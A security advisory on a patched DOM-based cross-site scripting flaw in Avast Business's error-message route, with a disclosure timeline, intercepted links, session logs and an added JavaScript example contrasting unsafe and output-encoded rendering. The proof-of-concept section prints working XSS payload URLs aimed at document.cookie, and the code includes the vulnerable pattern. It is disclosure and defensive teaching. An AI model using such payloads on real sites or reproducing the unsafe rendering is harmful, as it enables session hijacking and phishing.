Kieran Claessens - [http://www.vulnerability-lab.com/show.php?user=Kieran%20Claessens] VULNERLAB:1624
Document Title:
===============
AVAST Business #14 - Client Side Cross Site Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1624
Release Date:
=============
2016-05-23
Vulnerability Laboratory ID (VL-ID):
====================================
1624
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
Avast security software products are developed for Microsoft Windows, Mac OS X, Android and Linux users by AVAST Software s.r.o., a Czech private limited company.
Avast was founded in 1988, and is headquartered in Prague, Czech Republic. It produces antivirus and security programs for personal and commercial use. In January
2015, Avast had 21.4% of the worldwide security vendor market share. As of March 2015, Avast had 233 million users of its products and services worldwide. According
to a company press release, Avast protects more than 30 percent of the consumer PCs in the world outside of China. The software products have a user interface available
in 45 languages. Avast has 500 employees; 90 percent of whom work in the Czech Republic. Avast has 13 offices in Prague, Brno, Germany, China, South Korea, Taiwan & U.S.
(Copy of the Homepage: https://en.wikipedia.org/wiki/Avast_%28software_company%29 )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a client-side cross site scripting web vulnerability in the official Avast Business online service web-application.
Vulnerability Disclosure Timeline:
==================================
2015-10-27: Researcher Notification & Coordination (Kieran Claessens)
2015-10-27: Vendor Notification (AVAST Security Team - Bug Bounty Program)
2015-11-02: Vendor Response/Feedback (AVAST Security Team - Bug Bounty Program)
2015-11-24: Vendor Fix/Patch (AVAST Developer Team)
2016-05-23: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
AVAST!
Product: Business - Online Service (Web-Application) 2015 Q4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Low
Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Avast Business online service web-application.
The client-side vulnerability allows remote attackers to inject script code into client-side browser-to-application requests.
The vulnerability is located in the `error` route of the exception handling in the Avast Business online-service web-application. Remote attackers are
able to inject script code into a client-side GET request to the Avast Business website. The injection point is the error value of the exception, which is
carried in the URL fragment (`#error/<code>/<message>`). Because browsers never send the fragment to the server, the value is read and rendered only by the
client-side script, so server-side filtering and reflection-based browser filters do not see it; the injected script code executes in the error message
context as soon as that message is written into the page. The attack vector of the vulnerability is client-side and the request method to inject or execute is GET.
The security risk of the client-side cross site web vulnerability is estimated as low with a CVSS (Common Vulnerability Scoring System) count of 3.3.
Exploitation of the client-side cross site scripting web vulnerability requires no privileged web application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent loading of
malicious script code or client-side manipulation of affected or connected modules.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Avast - Business
Vulnerable Parameter(s):
[+] #error
Affected Module(s):
[+] Error - Exception Handling (Web-Server)
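The rendering pattern described above, as an added example that is not code from Avast or from the advisory author: a minimal client-side error route of the shape the PoC URLs show (`#error/<code>/<message>`), first in the unsafe form the advisory reports, then hardened by encoding the message before it is placed in markup. All names here (`parseErrorRoute`, `renderErrorVulnerable`, `renderErrorHardened`, `escapeHtml`, `POC_HASH`, `BENIGN_HASH`) are assumptions for illustration; the two fragments are constructed from the URLs in the PoC section.

```javascript
// Added example, not code from Avast or from the advisory author.
// Assumed route shape, taken from the PoC URLs: #error/<code>/<message>
// Function and constant names are illustrative assumptions.

// Split "#error/911/some%20message" into code and decoded message.
// Returns null for any fragment that is not an error route.
function parseErrorRoute(hash) {
  const m = /^#error\/(\d+)\/(.*)$/s.exec(hash);
  if (!m) return null;
  let message;
  try {
    message = decodeURIComponent(m[2]);
  } catch (e) {
    message = m[2]; // malformed percent-encoding: fall back to the raw text
  }
  return { code: Number(m[1]), message };
}

// Unsafe: the decoded message is concatenated into markup. In a page this string
// would be assigned to innerHTML, so a message that closes the element and opens
// <img onerror=...> runs script, which is what the PoC demonstrates.
function renderErrorVulnerable(hash) {
  const r = parseErrorRoute(hash);
  if (!r) return '';
  return '<div class="error" data-code="' + r.code + '">' + r.message + '</div>';
}

// Encode the five characters that can change HTML element or attribute context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Hardened: the message is encoded before it is placed in markup. The browser
// equivalent is to create the element and assign the message to textContent so
// that the string is never parsed as HTML at all.
function renderErrorHardened(hash) {
  const r = parseErrorRoute(hash);
  if (!r) return '';
  return '<div class="error" data-code="' + r.code + '">' + escapeHtml(r.message) + '</div>';
}

// Constructed inputs: the advisory's benign error redirect and its PoC payload.
// In a page these would come from window.location.hash, which the browser never
// sends to the server, so no server-side filter or response header sees them.
const BENIGN_HASH = '#error/911/Invalid%20iat%20parameter.%20The%20supplied%20iat%20value%20is%20more%20than%203%20minutes%20off,%20check%20your%20server%20clock.';
const POC_HASH = '#error/911/letsxssthis"><img src="K" onerror="alert(document.cookie)">';

console.log(renderErrorVulnerable(POC_HASH)); // markup contains a live <img onerror>
console.log(renderErrorHardened(POC_HASH));   // markup contains only encoded text
```

The hardened form keeps the route parsing unchanged; only the output encoding differs, which is the whole fix for this class of DOM-based issue. Note that the benign message carries percent-encoding while the PoC does not, so decoding has to happen before encoding for output, never after.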
Proof of Concept (PoC):
=======================
The client-side cross site vulnerability can be exploited by remote attackers without a privileged web-application user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Link (Intercepted):
https://support.business.avast.com/access/jwtjwt=eyJhbGciOiJIUzI1NiJ9.eyJyZW1vdGVfcGhvdG9fdXJsIjoiaHR0cHM6XC9cL2lkLmF2YXN0LmNvbVwvYXZ0XC8wMTQwZTMzMTMyZWE0YjEzMTNmMGQxNGM0ODU1Yzc3OWJlNThlZjdiNmY1YjE0NDVkODc5Y2MwMjQ1NzMxOGY2IiwidXNlcl9maWVsZHMiOnsibnVtYmVyX29mX2RldmljZXMiOjAsInB1cmNoYXNlZF9zdXBwb3J0IjpmYWxzZSwiY291bnRyeSI6IkJlbGdpdW0iLCJ3ZWJzaXRlIjoiaHR0cDpcL1wvd3d3Lmdvb2dsZS5jb20iLCJhZGRyZXNzIjoiXCI-PGltZyBzcmM9XCJYXCIgb25lcnJvcj1cImFsZXJ0KDEpXCIXG5cIj48aW1nIHNyYz1cIlhcIiBvbmVycm9yPVwiYWxlcnQoMSlcIj5cbjkwMDAiLCJwdXJjaGFzZWRfc2VjdXJlbGluZSI6ZmFsc2UsImluZHVzdHJ5IjoiQ09OU1VMVEFOQ1kiLCJwcmVtaXVtX3N1YnNjcmlwdGlvbiI6ZmFsc2UsInB1cmNoYXNlZF9pbnN0YWxsYXRpb24iOmZhbHNlLCJudW1iZXJfb2ZfZW1wbG95ZWVzIjoiMSAtIDUiLCJwaG9uZSI6IjEzMDAyOTkxMTEiLCJjb21wYW55X25hbWUiOiJCaXRzZWNcIj48aW1nIHNyYz1cIlhcIiBvbmVycm9yPVwiYWxlcnQoMSlcIj4ifSwibmFtZSI6InNlY3VyaXR5QGtpZXJhbmNsYWVzc2Vucy5iZSIsImV4dGVybmFsX2lkIjoiT3BRcV9xdkZTeW1fVDNiNjVsS3lmZzlFUU5EeHYwY1ZqM3BQZjVIZV9vSSIsImlhdCI6MTQ0NTY5MTQ4MSwiZW1haWwiOiJzZWN1cml0eUBraWVyYW5jbGFlc3NlbnMuYmUiLCJqdGkiOiIwZjc4NmI2OS03MWE4LTRlMmUtOGIzOS05NjVhNDVmYTZjODcifQ.CDST0tmNRXkc4N7zxJ6wHZ31WCyasEMdabYjeBNhv98
Link (Error Redirect):
https://business.avast.com/public/#error/911/Invalid%20iat%20parameter.%20The%20supplied%20iat%20value%20is%20more%20than%203%20minutes%20off,%20check%20your%20server%20clock.
Link PoC:
https://business.avast.com/public/#error/911/letsxssthis"><img src="K" onerror="alert(document.cookie)">
https://business.avast.com/public/#error/911/letsxssthis"><img src="K" onerror="alert(document.domain)">
--- PoC Session Logs [GET] ---
(The request below is the browser fetching the injected image source "K", resolved relative to /public/, after the payload was rendered into the page; the fragment itself never appears in any request.)
Status: 200[OK]
GET https://business.avast.com/public/K Load Flags[LOAD_NORMAL] Content Size[-1] Mime Type[text/html]
Request Header:
Host[business.avast.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://business.avast.com/public/]
Cookie[_ga=GA1.3.1707638216.1445943077; _gat_UA-58120669-2=1]
Connection[keep-alive]
Response Header:
Server[nginx/1.6.2]
Date[Tue, 27 Oct 2015 10:53:31 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
X-Frame-Options[SAMEORIGIN]
x-content-type-options[nosniff]
Strict-Transport-Security[max-age=31536000; includeSubdomains;]
X-XSS-Protection[1; mode=block]
Content-Encoding[gzip]
Reference(s):
https://business.avast.com/
https://business.avast.com/public/
https://business.avast.com/public/#error/
Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the avast business web-application is estimated as low. (CVSS 3.3)
Credits & Authors:
==================
Kieran Claessens - [http://www.vulnerability-lab.com/show.php?user=Kieran%20Claessens]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: [email protected] - [email protected] - [email protected]
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or [email protected]) to ask for permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™